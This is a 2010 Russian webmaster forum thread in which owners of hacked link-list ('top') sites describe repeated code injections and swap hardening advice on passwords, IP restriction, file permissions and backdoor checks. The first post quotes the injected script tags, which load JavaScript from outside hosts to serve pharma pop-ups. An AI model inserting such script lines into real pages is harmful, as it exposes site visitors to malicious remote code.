ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
 Добавлено: 17/11/10 в 08:05 |
опять сталкиваюсь с такой проблемой что мои топы поламаны и в них содержит посторонний | Код: | <script language="javascript" src="http://www.clayaim.com/index.php?ref=webex"></script>
<script src=http://crv.cc/c/></script> |
При заходи на сайт и после полной загрузки страницы появляется всплывающее поп окошко с рекламой виагры!
П.С. Версию топа обновил до последней версии 5.4 пасы поменял антивирус не выключаю но в скрипте время от времени бывает появляется посторонний код, даже гугл аналистик удалил, может через него как запихивают, хотя сколько работаю в онлайн не разу не сталкивался чтоб сайт был поломан только после того как в скрипте однажды появилась дырочка )
|
|
|
|
| |
С нами с 19.04.05
Сообщения: 1577
Рейтинг: 957
|
| Добавлено: 17/11/10 в 17:56 |
Возможно первый раз когда в шаблоны через узявимость был вставлен сплоит - ты заразил комп трояном с ф-цие форм грабер или ФТП снифером.
Хацкер смотря логи трояна увидел пароль на вход в админку и юзает его сейчас, тоже самое и с ФТП - возможно имеет доступ к фтп и инжектит всякие компоненты!
Как вариант
-поменяй пароли к admin.php
-смени ФТП пароль или разреши только с твоего ИП заходить на ФТП
-на файлы темплейтов поставть права 644 (редактировать придётся десктопно)
-проверь комп с помощью KIS и Cure It вохможно где то засел троян, так же на сервере где топы может быть руткит.
|
|
|
|
Link Trade - блоги в Art,Comics,Hentai,3D и тп - 338198557
|
6
|
|
| |
ASSES AND TITS
С нами с 15.03.03
Сообщения: 4478
Рейтинг: 1816
|
| Добавлено: 19/11/10 в 23:32 |
admin.php сделать блокировку доступа по айпи - в настройках вэб сервера
это самое простое
|
|
|
|
| |
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
| Добавлено: 30/11/10 в 13:42 |
|
|
|
|
| |
С нами с 06.06.03
Сообщения: 228
Рейтинг: 454
|
| Добавлено: 30/11/10 в 15:56 |
Удалил...
|
|
|
|
| |
С нами с 19.04.05
Сообщения: 1577
Рейтинг: 957
|
| Добавлено: 01/12/10 в 12:34 |
Danyil у тебя тоже через webmasters регу инекцию кода сделали?
Что то повальное заражение идёт....
|
|
|
|
Link Trade - блоги в Art,Comics,Hentai,3D и тп - 338198557
|
6
|
|
| |
С нами с 29.07.03
Сообщения: 682
Рейтинг: 440
|
| Добавлено: 01/12/10 в 19:03 |
Ахуенный дез топа! Очень понравился.
|
|
|
|
| |
С нами с 21.12.06
Сообщения: 92
Рейтинг: 29
|
| Добавлено: 02/12/10 в 19:54 |
|
|
|
|
| |
С нами с 06.06.03
Сообщения: 228
Рейтинг: 454
|
| Добавлено: 02/12/10 в 21:42 |
С помощью саппорта хоста, вычислили, что у меня на всех топах сетки изменён файл index.php
Всё восстановил, вроде пока проявлений вражеской деятельности незаметно. Затаился гад...
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 02/12/10 в 22:54 |
Danyil: Этот же фаил заменяется при обновлении топа
|
|
|
|
| |
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
| Добавлено: 06/12/10 в 22:56 |
| Danyil писал: | С помощью саппорта хоста, вычислили, что у меня на всех топах сетки изменён файл index.php
Всё восстановил, вроде пока проявлений вражеской деятельности незаметно. Затаился гад... |
Я на все index.* ставлю 444, да и на прочее, не требующее записи, тоже по возможности. Во многих случаях спасает...
|
|
|
|
| |
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
| Добавлено: 11/12/10 в 00:23 |
как все таки грамотно выставить на ГБ топ права чтобы и от атак обезвредить и чтобы все считало и работало
на саму папку где находится скрипт 755
alternative-templates 755
autorank 755
backupfiles 777
cgi-bin 755
datafiles 777
docs 755
memberfiles 777
templates 755
index.php 644
переименовать admin.php на другой и выставить 755
удалить File phpinfo.php
Все правильно ??? я пережил уже 4 атаки 
|
|
|
|
| |
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
| Добавлено: 11/12/10 в 00:24 |
я выставлял и на templates 644, на как то через раз открывает страницу топа
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 11/12/10 в 12:45 |
На пакпу темплейтс оставляйте 777 а на то что внутри 644. фаил uninstall.php тоже удалите.
|
|
|
|
| |
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
| Добавлено: 11/12/10 в 13:52 |
alternative-templates 755
autorank 755
cgi-bin 755
docs 755
и не нужны
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 11/12/10 в 14:00 |
gimcnuk: Эт точно. Ксттаи такое ощущение что овнеру срикпт не нужен может купим вскладчину?
|
|
|
|
| |
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
| Добавлено: 11/12/10 в 14:08 |
Он не продаёт, там алгоритм уникальный.
Вскладчину можно и новый скрипт заказать и выложить по GPL лицензии. Только без меня 
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 11/12/10 в 14:17 |
gimcnuk: Что так  ?
|
|
|
|
| |
С нами с 21.12.06
Сообщения: 92
Рейтинг: 29
|
| Добавлено: 15/12/10 в 00:00 |
Седня п*др опять повесил свою фигню на все мои сайты, правит все сайты на серваке (индексы и протоновский ssi_in.php). Смотрите не было ли у вас рецидива...
|
|
|
|
| |
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
| Добавлено: 15/12/10 в 19:48 |
и мои тоже сайты как всегда подверглись очередной атаке, самое интересное это хакеридзе все придумывает и неустает очередные идеи как обмануть честных мастеров, заходил под ру айпи все ок, вирусов нету, а если зайти через зарубежные айпи то вирус как ту появляется, предполагаю что хакер русский или где не далеко, бывает редирект идет на русские ПП и в основном это фарма. Будемс ждать следующей атаки... ;)
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 15/12/10 в 21:51 |
Ищите айпишник его, выкладывайте надо решать что то
|
|
|
|
| |
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
| Добавлено: 19/12/10 в 19:00 |
18 числа опять хакер изменил index.php, стояли права 644, хз че делать, в админке хоста пишет что файл изменил apache
|
|
|
|
| |
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
| Добавлено: 19/12/10 в 19:12 |
кое-где он после замены файла права на 444 поменял, как то
|
|
|
|
| |
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
| Добавлено: 19/12/10 в 19:25 |
да ваще безобразие творится какое то )
---
Подскажите, если с ГБ скрипта перейти на скрипт сиджей например на кристал, протон, трейд пульс может быть не будет таких атак? ГБ Скрипт все меньше и меньше теряет свои позиции бесплатного популярного скрипта, как раньше было 
|
|
|
|
| |
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
| Добавлено: 19/12/10 в 20:05 |
salo: возможно, был залит бекдор и гбскрипт уже не при чём. Поищи сторонние файлы.
|
|
|
|
| |
